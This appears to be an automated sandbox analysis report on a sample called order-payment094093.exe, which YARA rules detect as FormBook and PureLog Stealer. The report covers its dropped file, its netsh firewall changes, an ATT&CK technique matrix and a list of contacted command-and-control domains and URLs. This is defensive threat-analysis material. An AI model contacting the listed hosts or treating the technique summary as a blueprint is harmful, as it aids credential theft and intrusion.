Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Queries volume information: C:\Users\user\AppData\Roaming\NFOLsr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\order-payment094093.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Uses netsh to modify the Windows network and firewall settings

Source: C:\Windows\SysWOW64\explorer.exe

Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\SysWOW64\netsh.exe"

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 9.2.order-payment094093.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.order-payment094093.exe.4ae7560.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.order-payment094093.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.order-payment094093.exe.4a77940.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.3317866770.00000000036F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2197036751.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2359960797.0000000002D50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3317227992.00000000032F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3318427061.00000000050F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2125511708.00000000048A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3320712611.0000000006470000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Yara detected PureLog Stealer

Source: Yara match	File source: 0.2.order-payment094093.exe.9770000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.order-payment094093.exe.9770000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.order-payment094093.exe.2f88c64.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.order-payment094093.exe.2f87c4c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.NFOLsr.exe.33aae0c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.order-payment094093.exe.2f4ae90.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.NFOLsr.exe.33e7bc8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.NFOLsr.exe.33e8be0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2141897621.0000000009770000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2122231428.0000000002EBA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2246034694.000000000331A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 9.2.order-payment094093.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.order-payment094093.exe.4ae7560.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.order-payment094093.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.order-payment094093.exe.4a77940.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.3317866770.00000000036F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2197036751.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2359960797.0000000002D50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3317227992.00000000032F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3318427061.00000000050F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2125511708.00000000048A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3320712611.0000000006470000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Yara detected PureLog Stealer

Source: Yara match	File source: 0.2.order-payment094093.exe.9770000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.order-payment094093.exe.9770000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.order-payment094093.exe.2f88c64.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.order-payment094093.exe.2f87c4c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.NFOLsr.exe.33aae0c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.order-payment094093.exe.2f4ae90.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.NFOLsr.exe.33e7bc8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.NFOLsr.exe.33e8be0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2141897621.0000000009770000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2122231428.0000000002EBA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2246034694.000000000331A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 Scheduled Task/Job	712 Process Injection	1 Rootkit	1 Credential API Hooking	231 Security Software Discovery	Remote Services	1 Credential API Hooking	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	1 Scheduled Task/Job	1 Masquerading	LSASS Memory	2 Process Discovery	Remote Desktop Protocol	11 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Shared Modules	Logon Script (Windows)	1 DLL Side-Loading	21 Disable or Modify Tools	Security Account Manager	41 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	41 Virtualization/Sandbox Evasion	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	712 Process Injection	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 Deobfuscate/Decode Files or Information	Cached Domain Credentials	112 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	4 Obfuscated Files or Information	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	42 Software Packing	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Timestomp	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 DLL Side-Loading	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
order-payment094093.exe	56%	Virustotal		Browse
order-payment094093.exe	34%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
order-payment094093.exe	100%	Avira	HEUR/AGEN.1304427
order-payment094093.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\NFOLsr.exe	100%	Avira	HEUR/AGEN.1304427
C:\Users\user\AppData\Roaming\NFOLsr.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\NFOLsr.exe	34%	ReversingLabs	ByteCode-MSIL.Trojan.Generic

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
ssl1.prod.systemdragon.com	0%	Virustotal	Browse
www.tuskerlogix.com	0%	Virustotal	Browse
www.stmbbill.com	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
https://word.office.comM	0%	URL Reputation	safe
https://outlook.come	0%	URL Reputation	safe
http://schemas.micro	0%	URL Reputation	safe
https://www.chiark.greenend.org.uk/~sgtatham/putty/0	0%	URL Reputation	safe
https://powerpoint.office.comEMd	0%	URL Reputation	safe
http://www.stmbbill.com/hd05/	0%	Avira URL Cloud	safe
http://www.damtherncooling.com/hd05/www.teramilab.com	0%	Avira URL Cloud	safe
http://www.teramilab.comReferer:	0%	Avira URL Cloud	safe
http://www.buddhasiddhartha.com	0%	Avira URL Cloud	safe
http://www.businessjp6-51399.info/hd05/?qN9=GZs8E2R84fNPO8q&nddt40n=JEike4UQJLQakUPq/U16jy99RdjpJ2GxkH0s41l6Bypxc6148iCveXLCB/psYJ6oRgQVgJFOnA==	0%	Avira URL Cloud	safe
http://www.damtherncooling.com/hd05/	0%	Avira URL Cloud	safe
http://www.kathrynmirabella.com	0%	Avira URL Cloud	safe
http://www.symplywell.me/hd05/	0%	Avira URL Cloud	safe
http://www.lezxop.xyz	0%	Avira URL Cloud	safe
http://www.kathrynmirabella.comReferer:	0%	Avira URL Cloud	safe
http://www.symplywell.me	0%	Avira URL Cloud	safe
http://www.tuskerlogix.com	0%	Avira URL Cloud	safe
http://www.lezxop.xyz/hd05/www.dropshunter.net	0%	Avira URL Cloud	safe
http://www.businessjp6-51399.info	0%	Avira URL Cloud	safe
http://www.vagabondtracks.com	0%	Avira URL Cloud	safe
http://www.stairs.parts/hd05/www.tuskerlogix.com	0%	Avira URL Cloud	safe
http://www.buddhasiddhartha.com/hd05/	0%	Avira URL Cloud	safe
www.vagabondtracks.com/hd05/	0%	Avira URL Cloud	safe
http://www.lovepox.com/hd05/www.kathrynmirabella.com	0%	Avira URL Cloud	safe
http://www.lezxop.xyzReferer:	0%	Avira URL Cloud	safe
http://www.businessjp6-51399.info/hd05/www.stmbbill.com	0%	Avira URL Cloud	safe
http://www.lovepox.comReferer:	0%	Avira URL Cloud	safe
http://www.damtherncooling.com	0%	Avira URL Cloud	safe
http://www.stmbbill.com	0%	Avira URL Cloud	safe
http://www.stmbbill.com/hd05/www.lezxop.xyz	0%	Avira URL Cloud	safe
http://www.7727.info	0%	Avira URL Cloud	safe
http://www.dropshunter.net	0%	Avira URL Cloud	safe
http://www.dropshunter.net/hd05/	0%	Avira URL Cloud	safe
http://www.lovepox.com	0%	Avira URL Cloud	safe
http://www.sparkfirestarter.net	0%	Avira URL Cloud	safe
http://www.sparkfirestarter.net/hd05/www.damtherncooling.com	0%	Avira URL Cloud	safe
http://www.stmbbill.comReferer:	0%	Avira URL Cloud	safe
http://www.lezxop.xyz/hd05/	0%	Avira URL Cloud	safe
http://www.uniqueofferss.com/hd05/	0%	Avira URL Cloud	safe
http://www.teramilab.com	0%	Avira URL Cloud	safe
http://www.7727.infoReferer:	0%	Avira URL Cloud	safe
http://www.teramilab.com/hd05/www.7727.info	0%	Avira URL Cloud	safe
http://www.teramilab.com/hd05/	0%	Avira URL Cloud	safe
http://www.damtherncooling.comReferer:	0%	Avira URL Cloud	safe
http://www.uniqueofferss.com	0%	Avira URL Cloud	safe
http://www.stairs.partsReferer:	0%	Avira URL Cloud	safe
http://www.kathrynmirabella.com/hd05/	0%	Avira URL Cloud	safe
http://www.vagabondtracks.comReferer:	0%	Avira URL Cloud	safe
http://www.businessjp6-51399.info/hd05/	0%	Avira URL Cloud	safe
http://www.tuskerlogix.comReferer:	0%	Avira URL Cloud	safe
http://www.stairs.parts/hd05/	0%	Avira URL Cloud	safe
http://www.dropshunter.net/hd05/www.symplywell.me	0%	Avira URL Cloud	safe
http://www.buddhasiddhartha.comReferer:	0%	Avira URL Cloud	safe
http://www.businessjp6-51399.infoReferer:	0%	Avira URL Cloud	safe
http://www.tuskerlogix.com/hd05/	0%	Avira URL Cloud	safe
http://www.buddhasiddhartha.com/hd05/www.sparkfirestarter.net	0%	Avira URL Cloud	safe
http://www.symplywell.me/hd05/www.buddhasiddhartha.com	0%	Avira URL Cloud	safe
http://www.stmbbill.com/hd05/?nddt40n=p/NjLOTdg7dIkWP+lnUu3znTw9xENS3rMvTkW+jKr2KjzzB4K5JtXdnsbZtTcOdHBVbqDwqHsQ==&qN9=GZs8E2R84fNPO8q	0%	Avira URL Cloud	safe
http://www.symplywell.meReferer:	0%	Avira URL Cloud	safe
http://www.uniqueofferss.comReferer:	0%	Avira URL Cloud	safe
http://www.7727.info/hd05/	0%	Avira URL Cloud	safe
http://www.sparkfirestarter.net/hd05/	0%	Avira URL Cloud	safe
http://www.uniqueofferss.com/hd05/www.lovepox.com	0%	Avira URL Cloud	safe
https://excel.office.com-	0%	Avira URL Cloud	safe
http://www.sparkfirestarter.netReferer:	0%	Avira URL Cloud	safe
http://www.kathrynmirabella.com/hd05/www.vagabondtracks.com	0%	Avira URL Cloud	safe
http://www.lovepox.com/hd05/	0%	Avira URL Cloud	safe
http://www.vagabondtracks.com/hd05/	0%	Avira URL Cloud	safe
http://www.7727.info/hd05/www.uniqueofferss.com	0%	Avira URL Cloud	safe
http://www.dropshunter.netReferer:	0%	Avira URL Cloud	safe
http://www.tuskerlogix.com/hd05/www.businessjp6-51399.info	0%	Avira URL Cloud	safe
http://www.tuskerlogix.com/hd05/?nddt40n=H11Sq1KAmWy3TZ4g686+8cOrtC6/zVWn9hhmKxw0qAe7Dkpr8OJlJcVglPxuSZ3INis2/OJA+Q==&qN9=GZs8E2R84fNPO8q	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
tuskerlogix.com	3.33.130.190	true	true		unknown
stmbbill.com	15.197.142.173	true	true		unknown
ssl1.prod.systemdragon.com	104.18.188.223	true	true	0%, Virustotal, Browse	unknown
www.stairs.parts	192.64.119.254	true	true		unknown
www.tuskerlogix.com	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.businessjp6-51399.info	unknown	unknown	true		unknown
www.stmbbill.com	unknown	unknown	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.businessjp6-51399.info/hd05/?qN9=GZs8E2R84fNPO8q&nddt40n=JEike4UQJLQakUPq/U16jy99RdjpJ2GxkH0s41l6Bypxc6148iCveXLCB/psYJ6oRgQVgJFOnA==	true	Avira URL Cloud: safe	unknown
www.vagabondtracks.com/hd05/	true	Avira URL Cloud: safe	low
http://www.stmbbill.com/hd05/?nddt40n=p/NjLOTdg7dIkWP+lnUu3znTw9xENS3rMvTkW+jKr2KjzzB4K5JtXdnsbZtTcOdHBVbqDwqHsQ==&qN9=GZs8E2R84fNPO8q	true	Avira URL Cloud: safe	unknown
